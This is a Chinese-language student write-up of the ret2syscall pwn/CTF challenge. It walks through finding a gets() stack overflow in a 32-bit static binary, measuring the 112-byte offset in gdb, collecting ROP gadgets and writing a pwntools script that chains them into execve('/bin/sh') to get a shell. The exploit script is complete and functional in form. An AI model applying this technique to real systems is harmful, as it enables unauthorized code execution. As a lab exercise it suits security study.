(此文章是本人学习pwn的思路笔记,内容不肯定百分百正确,如有错误望指出)
题目链接:https://pan.baidu.com/s/1Aw6JgRLZhMfQp1NdOtJLPw?pwd=1234
提取码:1234
所需环境和软件:python、pwn库、gdb、IDA、ROPgaget
阅读此文章需要有一点ROP基础,下好此文件后,将此可执行文件复制一份放入Linux操作系统中(给gdb调试用和用python脚本攻击),再复制一份放入Windows操作系统中(用IDA32查看反汇编代码)
题目思路:
1、拿到题目用Linux的checksec工具查看文件类型、查看文件安全措施情况,命令为:
"checksec 文件名",如下图所示,可以看到是32位的ELF文件,小端,用的是静态链接(代码段很多),该ELF文件没有canary 保护,栈不可执行。
2、在windows中用IDA32软件查看该文件的伪代码,如下图所示可以看到main方法里定义了一个v4变量,且用了gets函数向v4输入内容,输入的内容长度是无限制的(gets()函数的特性),所以我们可以尝试栈溢出。
3、如下图所示,在Linux的shell里用gdb打开该ELF文件进行动态调试,因为我提前设置好了pwndbg为gdb的默认调试工具,所以在pwndbg用 b main 命令来给main函数设置断点,然后使用命令 r 开始运行程序,程序就会一直运行到断点位置(这里是main函数的开始),然后暂停运行。
4、暂停后在pwndbg中用命令 n 先进行一些步过(一行一行的执行汇编代码) ,当一行一行执行到如下图所示的汇编指令时,程序会让我们输入一些数据(即之前在IDA看到的伪代码中的gets函数起的作用,可以输入无限长的数据,输入的数据给了v4变量),然后我们就可以往v4变量里输入一些数据,我先输入AAAAAA来测试一下输入的数据存入了栈的哪个位置
5、用 stack 40 命令来扩大stack栈的可视范围,如下图所示就可以看到输入的数据AAAAAA在地址0xffffd07c 的位置(即以后输入数据都是从此位置开始往低位地址往高地址输入数据【栈的特性】),在下图可以看到main函数的ebp的位置是0xffffd0e8
6、用python 来计算输入的数据AAAAAA(v4变量开始存放的地址)和main函数的ebp之间的距离有多少个字节,如下图所示通过俩个地址相减可以得到俩个地址之间的距离位108字节,所以我们从写入108个字节的垃圾数据就可以覆盖掉栈中"开始输入的地方到ebp开始的地方"之间的数据,或者写入112(108 + 4)个字节的垃圾数据就可以覆盖掉栈中"开始输入的地方到ebp结束的地方"之间的数据。
7、因为这个实验我们最终要实现的是控制远程的服务器,所以我们要在程序中实现这行系统内核的代码sys_execve(“/bin/sh”,0,0) 来获取服务器的shell,因为我们不能直接调用操作系统内核的函数,所以我们可以把这行代码转换后交给内存中的kernel段(操作系统内核的函数)进行系统调用,那要怎么转换呢?
转换成系统看得懂的函数:int 0x80(0xb,'/bin/sh',0,0)
int 0x80(0xb,'/bin/sh',0,0) 转换成汇编代码为:
mov eax,0xb //0xb是sys_execve的系统调用号,可以根据此系统调用号来调用sys_execve内核函数
mov edx,0 //相当sys_execve的第三个参数0
mov ecx,0 //相当sys_execve的第二个参数0
mov ebx,[“/bin/sh”] //相当sys_execve的第一个参数“/bin/sh”
int 0x80 //中断指令(系统调用函数的指令),当执行到这条指令时,就会进行系统调用,取出eax寄存器里的系统调用号,取出寄存器里的各个参数,也就相当于会执行这条代码execve(“/bin/sh”,0,0) 。
但上面的这五条汇编代码不会一模一样的在内存中的代码段(text段)中存在,也就不能利用这五条汇编代码来实现int 0x80(0xb,'/bin/sh',0,0)了,所以我们再转换一下,利用代码段中已有的汇编代码(gadget),来实现int 0x80(0xb,'/bin/sh',0,0),那要怎么利用已有的代码段呢?
利用ROPgadget工具来在程序中已有的汇编代码里查找所需要的一条条汇编代码,将需要的每条汇编代码利用ret链接起来,使得eax寄存器里的值为0xb ,ebx寄存器里的值为“/bin/sh” ,edx寄存器里的值为0,ecx寄存器里的值为0
如下面四个图所示,利用ROPgadget的命令找到了三条适合的汇编代码和"bin/sh"字符串的地址
所以execve(“/bin/sh”,0,0) = int 0x80(0xb,'/bin/sh',0,0) = 以下的三条汇编代码+构造好的栈
pop eax ;ret;
(且内存里的栈先弹出eax寄存器里需要存的值为0xb存入eax寄存器,后弹出汇编代码"pop edx; pop ecx; pop ebx; return;"的地址值存入eip寄存器)(各个地址值上面四张图都有标注)
pop edx; pop ecx; pop ebx; return;
(且内存里的栈先弹出edx寄存器里需要存的值为0存入edx寄存器,再弹出ecx寄存器里需要存的值为0存入ecx寄存器,再弹出ebx寄存器里需要存的值为字符串"/bin/sh"所在的地址值存入ebx寄存器,再弹出汇编代码“int 0x80”所在的地址值存入eip寄存器)
int 0x80;
利用gets函数无限输入的特性可以构造好一个栈:
所以最终我们可以开始写python攻击脚本了:
from pwn import *
io = process("./ret2syscall") //创建一个程序的进程
addr_eax = 0x080bb196
addr_edx_ecx_ebx = 0x0806eb90
addr_binsh = 0x080be408
addr_int _0x80 = 0x08049421
payload = flat([b'A'*112, addr_eax, 0xb, addr_edx_ecx_ebx, 0, 0, addr_binsh, addr_int_0x80])
//flat函数是专门为形成payload设计的函数,它可以把列表里的每一项都转换成字节流,最后把列表里的每一项拼接起来
//等效于 payload = b'A'*112 + p32(addr_eax) + p32(0xb) + p32(addr_edx_ecx_ebx) + p32(0) + p32(0) + p32(addr_binsh) + p32(addr_int_0x80)
io.sendline(payload)
io.interactive()
然后运行该python脚本就可以获取到shell了